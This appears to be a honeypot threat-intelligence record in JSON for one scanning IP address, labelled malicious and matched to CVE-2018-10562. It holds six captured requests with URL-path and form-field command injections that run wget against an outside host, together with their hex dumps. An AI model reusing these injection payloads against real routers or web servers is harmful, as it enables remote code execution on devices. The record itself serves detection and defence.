{"ip":"85.11.167.250","total_events":6,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"5 exploit-path hits","confidence":"high","network_type":null,"why":["5 request(s) matched a known exploit path.","Body-carrying methods (POST/PUT/PATCH/DELETE) seen: payload delivery, not just recon.","5+ hits raise confidence to high.","Not in any known-scanner range."],"engagement":{"level":"request","label":"Request traffic","detail":"3,883 bytes sent","bytes_sent":3883,"session_seconds":28,"persistent":false}},"first_seen":"2026-08-28T18:13:43","last_seen":"2026-08-28T18:22:50","events_24h":0,"events_7d":0,"geo":{"country_code":"NL","country_name":"The Netherlands","region":"North Holland","city":"Amsterdam","lat":52.3716,"lon":4.8883,"asn":197170,"org":"TechTies Inc."},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[{"cve_id":"CVE-2018-10562","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form"}],"malware":[],"top_ports":[{"port":8443,"proto":"tcp","label":"HTTPS-alt","count":5},{"port":8080,"proto":"tcp","label":"HTTP-alt","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":["t13i131000_f57a46bbacb6_e5728521abd4"],"tls_client_hello":"","tls_ja3":["ad8e2ddea9ec0a77edc063c36fc6cecc"],"http_akin":[]},"fingerprint_peers":{"t13i131000_f57a46bbacb6_e5728521abd4":61},"akin_families":{},"user_agents":["curl/7.3.2","Mozilla/5.0"],"timeline":[{"date":"2026-08-28","count":6}],"recent_events":[{"timestamp":"2026-08-28T18:22:50","port":8443,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"host\":\"<HONEYPOT>:8443\",\"user-agent\":\"Mozilla/5.0\"}","body":"","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":[],"url_path":"/cgi-bin/;wget%20-q%20%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dnetgear%26t%3D<HONEYPOT>%26r%3D4812676232480400315%27%20-O%20%2Fdev%2Fnull","summary":"","payload_hex":"474554202f6367692d62696e2f3b776765742532302d712532302532376874747025334125324625324633312e35362e3230392e323130253246636865636b253346762533446e65746765617225323674253344<HONEYPOT>25323672253344343831323637363233323438303430303331352532372532302d4f2532302532466465762532466e756c6c20485454502f312e310d0a486f73743a20<HONEYPOT>3a383434330d0a557365722d4167656e743a204d6f7a696c6c612f352e300d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a","method":"GET","user_agent":"Mozilla/5.0","ja3":"ad8e2ddea9ec0a77edc063c36fc6cecc","session":"d353235c-bd11-4b37-981e-92604f10818e","seq":5,"duration_ms":27940,"bytes_in":1177,"bytes_out":390},{"timestamp":"2026-08-28T18:22:34","port":8443,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"host\":\"<HONEYPOT>:8443\",\"user-agent\":\"Mozilla/5.0\"}","body":"","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":[],"url_path":"/cgi-bin/;wget%20-q%20%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dnetgear%26t%3D<HONEYPOT>%26r%3D899478153878242367%27%20-O%20%2Fdev%2Fnull","summary":"","payload_hex":"474554202f6367692d62696e2f3b776765742532302d712532302532376874747025334125324625324633312e35362e3230392e323130253246636865636b253346762533446e65746765617225323674253344<HONEYPOT>253236722533443839393437383135333837383234323336372532372532302d4f2532302532466465762532466e756c6c20485454502f312e310d0a486f73743a20<HONEYPOT>3a383434330d0a557365722d4167656e743a204d6f7a696c6c612f352e300d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a","method":"GET","user_agent":"Mozilla/5.0","ja3":"ad8e2ddea9ec0a77edc063c36fc6cecc","session":"d353235c-bd11-4b37-981e-92604f10818e","seq":4,"duration_ms":12588,"bytes_in":941,"bytes_out":312},{"timestamp":"2026-08-28T18:22:28","port":8443,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"host\":\"<HONEYPOT>:8443\",\"user-agent\":\"Mozilla/5.0\"}","body":"","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":[],"url_path":"/cgi-bin/;wget%20-q%20%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dnetgear%26t%3D<HONEYPOT>%26r%3D806599279805274437%27%20-O%20%2Fdev%2Fnull","summary":"","payload_hex":"474554202f6367692d62696e2f3b776765742532302d712532302532376874747025334125324625324633312e35362e3230392e323130253246636865636b253346762533446e65746765617225323674253344<HONEYPOT>253236722533443830363539393237393830353237343433372532372532302d4f2532302532466465762532466e756c6c20485454502f312e310d0a486f73743a20<HONEYPOT>3a383434330d0a557365722d4167656e743a204d6f7a696c6c612f352e300d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a","method":"GET","user_agent":"Mozilla/5.0","ja3":"ad8e2ddea9ec0a77edc063c36fc6cecc","session":"d353235c-bd11-4b37-981e-92604f10818e","seq":3,"duration_ms":6085,"bytes_in":706,"bytes_out":234},{"timestamp":"2026-08-28T18:22:24","port":8443,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"host\":\"<HONEYPOT>:8443\",\"user-agent\":\"Mozilla/5.0\"}","body":"","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":[],"url_path":"/cgi-bin/;wget%20-q%20%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dnetgear%26t%3D<HONEYPOT>%26r%3D505498872605404494%27%20-O%20%2Fdev%2Fnull","summary":"","payload_hex":"474554202f6367692d62696e2f3b776765742532302d712532302532376874747025334125324625324633312e35362e3230392e323130253246636865636b253346762533446e65746765617225323674253344<HONEYPOT>253236722533443530353439383837323630353430343439342532372532302d4f2532302532466465762532466e756c6c20485454502f312e310d0a486f73743a20<HONEYPOT>3a383434330d0a557365722d4167656e743a204d6f7a696c6c612f352e300d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a","method":"GET","user_agent":"Mozilla/5.0","ja3":"ad8e2ddea9ec0a77edc063c36fc6cecc","session":"d353235c-bd11-4b37-981e-92604f10818e","seq":2,"duration_ms":2442,"bytes_in":471,"bytes_out":156},{"timestamp":"2026-08-28T18:22:22","port":8443,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"host\":\"<HONEYPOT>:8443\",\"user-agent\":\"Mozilla/5.0\"}","body":"","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":[],"url_path":"/cgi-bin/;wget%20-q%20%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dnetgear%26t%3D<HONEYPOT>%26r%3D5426154038318689710%27%20-O%20%2Fdev%2Fnull","summary":"","payload_hex":"474554202f6367692d62696e2f3b776765742532302d712532302532376874747025334125324625324633312e35362e3230392e323130253246636865636b253346762533446e65746765617225323674253344<HONEYPOT>25323672253344353432363135343033383331383638393731302532372532302d4f2532302532466465762532466e756c6c20485454502f312e310d0a486f73743a20<HONEYPOT>3a383434330d0a557365722d4167656e743a204d6f7a696c6c612f352e300d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a","method":"GET","user_agent":"Mozilla/5.0","ja3":"ad8e2ddea9ec0a77edc063c36fc6cecc","session":"d353235c-bd11-4b37-981e-92604f10818e","seq":1,"duration_ms":100,"bytes_in":236,"bytes_out":78},{"timestamp":"2026-08-28T18:13:43","port":8080,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"content-length\":\"188\",\"content-type\":\"text/plain\",\"host\":\"<HONEYPOT>:8080\",\"user-agent\":\"curl/7.3.2\"}","body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget+-q+%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dgpon%26t%3D<HONEYPOT>%26r%3D1517637819894093373%27+-O+%2Fdev%2Fnull`&ipv=0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/GponForm/diag_Form?images/","summary":"","payload_hex":"504f5354202f47706f6e466f726d2f646961675f466f726d3f696d616765732f20485454502f312e310d0a486f73743a20<HONEYPOT>3a383038300d0a557365722d4167656e743a206375726c2f372e332e320d0a436f6e74656e742d4c656e6774683a203138380d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a58576562506167654e616d653d6469616726646961675f616374696f6e3d70696e672677616e5f636f6e6c6973743d3026646573745f686f73743d60776765742b2d712b2532376874747025334125324625324633312e35362e3230392e323130253246636865636b2533467625334467706f6e25323674253344<HONEYPOT>25323672253344313531373633373831393839343039333337332532372b2d4f2b2532466465762532466e756c6c60266970763d30","method":"POST","user_agent":"curl/7.3.2","ja3":"","session":"a1535c70-c3c3-4341-b779-d6f2afee3be2","seq":1,"duration_ms":100,"bytes_in":352,"bytes_out":78}],"http_methods":[{"method":"GET","count":5},{"method":"POST","count":1}],"distinct_ports_total":2,"top_paths":[{"path":"/cgi-bin/;wget%20-q%20%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dnetgear%26t%3D<HONEYPOT>%26r%3D5426154038318689710%27%20-O%20%2Fdev%2Fnull","count":1,"ports":1},{"path":"/cgi-bin/;wget%20-q%20%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dnetgear%26t%3D<HONEYPOT>%26r%3D806599279805274437%27%20-O%20%2Fdev%2Fnull","count":1,"ports":1},{"path":"/cgi-bin/;wget%20-q%20%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dnetgear%26t%3D<HONEYPOT>%26r%3D505498872605404494%27%20-O%20%2Fdev%2Fnull","count":1,"ports":1},{"path":"/cgi-bin/;wget%20-q%20%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dnetgear%26t%3D<HONEYPOT>%26r%3D4812676232480400315%27%20-O%20%2Fdev%2Fnull","count":1,"ports":1},{"path":"/GponForm/diag_Form?images/","count":1,"ports":1},{"path":"/cgi-bin/;wget%20-q%20%27http%3A%2F%2F31.56.209.210%2Fcheck%3Fv%3Dnetgear%26t%3D<HONEYPOT>%26r%3D899478153878242367%27%20-O%20%2Fdev%2Fnull","count":1,"ports":1}],"distinct_paths_total":6,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept-Encoding","Content-Length","Content-Type","Host","User-Agent"],"representative":[{"name":"Accept-Encoding","value":"gzip","notable":false},{"name":"Content-Length","value":"188","notable":false},{"name":"Content-Type","value":"text/plain","notable":true},{"name":"Host","value":"<HONEYPOT>:8080","notable":false},{"name":"User-Agent","value":"curl/7.3.2","notable":false}],"distinct_sets":2,"events_with_headers":6},"tags":[{"tag_id":"CVE-2018-10562","tag_type":"cve","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form","reference_urls":["https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router","https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py","https://nvd.nist.gov/vuln/detail/CVE-2018-10562","https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/","https://github.com/ethicalhackeragnidhra/GPON"]}],"data_as_of":"2026-09-24T12:54:57.121910+00:00"}